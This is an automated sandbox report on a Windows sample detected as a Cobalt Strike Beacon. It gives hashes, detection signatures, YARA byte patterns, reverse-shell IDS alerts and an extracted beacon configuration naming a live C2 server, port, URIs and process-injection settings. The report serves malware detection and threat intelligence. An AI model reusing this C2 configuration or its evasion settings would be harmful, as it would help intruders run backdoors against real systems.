Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
31#U544a.exe

Overview

General Information

Sample name:31#U544a.exe
renamed because original name is a hash value
Original sample name:CEAP.exe
Analysis ID:1568880
MD5:7d6748d103f78d1a8ddab5646c5cb1a3
SHA1:744a3590531665487bf22bc7df7b45663a30790f
SHA256:8ac3f3a5bd3ba1cb8490cf1c69c364a39feac66ee084cf218f3dd11e9be3ac92
Tags:backdoorexegenericxor-urluser-zhuzhu0009
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 31#U544a.exe (PID: 6260 cmdline: "C:\Users\user\Desktop\31#U544a.exe" MD5: 7D6748D103F78D1A8DDAB5646C5CB1A3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTPS"], "Port": 10203, "SleepTime": 15000, "MaxGetSize": 2798827, "Jitter": 20, "C2Server": "202.175.7.146,/bfs/svg-next/BDC/playdata_square_line/v1.json", "HttpPostUri": "/cgi/video/getVideoRecList", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 1013 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": "Host: 202.175.7.146\r\n"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2905522054.000001912B7A1000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
    00000000.00000002.2905472003.000001912B770000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_663fc95dIdentifies CobaltStrike via unidentified function codeunknown
    • 0x1ce48:$a: 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00
    00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
      00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
        00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
          Click to see the 6 entries
          No Sigma rule has matched
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-05T05:29:55.785387+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449917TCP
          2024-12-05T05:30:02.018686+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449731TCP
          2024-12-05T05:30:07.601315+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449733TCP
          2024-12-05T05:30:11.022236+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449734TCP
          2024-12-05T05:30:14.429556+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449735TCP
          2024-12-05T05:30:17.857559+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449738TCP
          2024-12-05T05:30:21.424773+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449742TCP
          2024-12-05T05:30:24.882636+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449744TCP
          2024-12-05T05:30:28.370918+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449745TCP
          2024-12-05T05:30:31.802831+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449746TCP
          2024-12-05T05:30:35.237676+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449747TCP
          2024-12-05T05:30:39.114934+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449748TCP
          2024-12-05T05:30:42.545267+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449749TCP
          2024-12-05T05:30:45.997969+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449750TCP
          2024-12-05T05:30:49.454200+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449751TCP
          2024-12-05T05:30:52.947888+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449752TCP
          2024-12-05T05:30:56.391228+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449753TCP
          2024-12-05T05:30:59.851798+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449756TCP
          2024-12-05T05:31:03.394222+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449767TCP
          2024-12-05T05:31:06.867041+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449773TCP
          2024-12-05T05:31:10.305104+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449784TCP
          2024-12-05T05:31:13.889242+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449790TCP
          2024-12-05T05:31:17.347274+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449800TCP
          2024-12-05T05:31:20.880712+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449809TCP
          2024-12-05T05:31:24.327126+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449817TCP
          2024-12-05T05:31:27.740736+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449828TCP
          2024-12-05T05:31:31.173759+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449834TCP
          2024-12-05T05:31:34.639153+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449845TCP
          2024-12-05T05:31:38.111359+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449852TCP
          2024-12-05T05:31:41.575021+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449862TCP
          2024-12-05T05:31:44.996980+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449873TCP
          2024-12-05T05:31:48.427962+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449879TCP
          2024-12-05T05:31:51.998954+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449890TCP
          2024-12-05T05:31:55.566157+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449897TCP
          2024-12-05T05:31:59.067743+010020356511A Network Trojan was detected202.175.7.14610203192.168.2.449907TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 31#U544a.exeAvira: detected
          Source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 10203, "SleepTime": 15000, "MaxGetSize": 2798827, "Jitter": 20, "C2Server": "202.175.7.146,/bfs/svg-next/BDC/playdata_square_line/v1.json", "HttpPostUri": "/cgi/video/getVideoRecList", "Malleable_C2_Instructions": ["Remove 1522 bytes from the end", "Remove 84 bytes from the beginning", "Remove 1013 bytes from the beginning", "Base64 URL-safe decode", "XOR mask w/ random key"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\dllhost.exe", "Spawnto_x64": "%windir%\\sysnative\\dllhost.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 17500, "ProcInject_PrependAppend_x86": ["kJA=", "Empty"], "ProcInject_PrependAppend_x64": ["kJA=", "Empty"], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "NtMapViewOfSection", "bUsesCookies": "True", "HostHeader": "Host: 202.175.7.146\r\n"}
          Source: 31#U544a.exeReversingLabs: Detection: 13%
          Source: 31#U544a.exeVirustotal: Detection: 26%Perma Link
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: 31#U544a.exeJoe Sandbox ML: detected
          Source: unknownHTTPS traffic detected: 118.31.219.225:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: 31#U544a.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 4x nop then push r120_2_00007FF71A85B316

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49744
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49733
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49748
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49731
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49738
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49734
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49745
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49749
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49742
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49773
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49747
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49751
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49735
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49767
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49750
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49752
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49809
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49790
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49753
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49784
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49756
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49817
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49746
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49828
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49800
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49834
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49845
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49852
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49862
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49873
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49890
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49879
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49897
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49907
          Source: Network trafficSuricata IDS: 2035651 - Severity 1 - ET MALWARE Meterpreter or Other Reverse Shell SSL Cert : 202.175.7.146:10203 -> 192.168.2.4:49917
          Source: Malware configuration extractorURLs: 202.175.7.146
          Source: global trafficTCP traffic: 192.168.2.4:49731 -> 202.175.7.146:10203
          Source: global trafficHTTP traffic detected: GET /update.json HTTP/1.1accept: */*host: leganse.oss-cn-hangzhou.aliyuncs.com
          Source: Joe Sandbox ViewASN Name: CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMO CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMO
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: unknownTCP traffic detected without corresponding DNS query: 202.175.7.146
          Source: C:\Users\user\Desktop\31#U544a.exeCode function: 0_2_00007FF71A84EB09 recv,WSAGetLastError,0_2_00007FF71A84EB09
          Source: global trafficHTTP traffic detected: GET /update.json HTTP/1.1accept: */*host: leganse.oss-cn-hangzhou.aliyuncs.com
          Source: global trafficDNS traffic detected: DNS query: leganse.oss-cn-hangzhou.aliyuncs.com
          Source: 31#U544a.exe, 00000000.00000003.1953586887.000001912B6C5000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B09C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.liveapi.com/
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.liveapi.com/.
          Source: 31#U544a.exe, 00000000.00000003.1746035165.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.liveapi.com/d06
          Source: 31#U544a.exe, 00000000.00000003.1953841512.000001912B0FB000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2905242341.000001912B6E8000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.liveapi.com/gzip
          Source: 31#U544a.exe, 00000000.00000003.1878032408.000001912B106000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.liveapi.com/y
          Source: 31#U544a.exe, 00000000.00000003.1690676459.000001912B0B7000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690624284.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mZ6/
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
          Source: 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
          Source: 31#U544a.exe, 00000000.00000002.2905242341.000001912B6BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab.9e#
          Source: 31#U544a.exe, 00000000.00000003.1740111790.000001912BED1000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1740158778.000001912BEF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?85050d4d7d887
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B02C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stream.liveapi.com/
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/;q=0.8
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json#y
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json-x
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json7y
          Source: 31#U544a.exe, 00000000.00000003.1883833961.000001912B09D000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B09C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonF
          Source: 31#U544a.exe, 00000000.00000003.1746035165.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonP
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonorientation?
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonr
          Source: 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonsy
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonyy
          Source: 31#U544a.exe, 00000000.00000003.1878032408.000001912B106000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/dll
          Source: 31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/l
          Source: 31#U544a.exe, 00000000.00000003.1953628567.000001912B09A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/ll
          Source: 31#U544a.exe, 00000000.00000003.1746035165.000001912B061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://202.175.7.146:10203/y
          Source: 31#U544a.exeString found in binary or memory: https://github.com/DosX-dev/UPX-Patcher
          Source: 31#U544a.exe, 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json
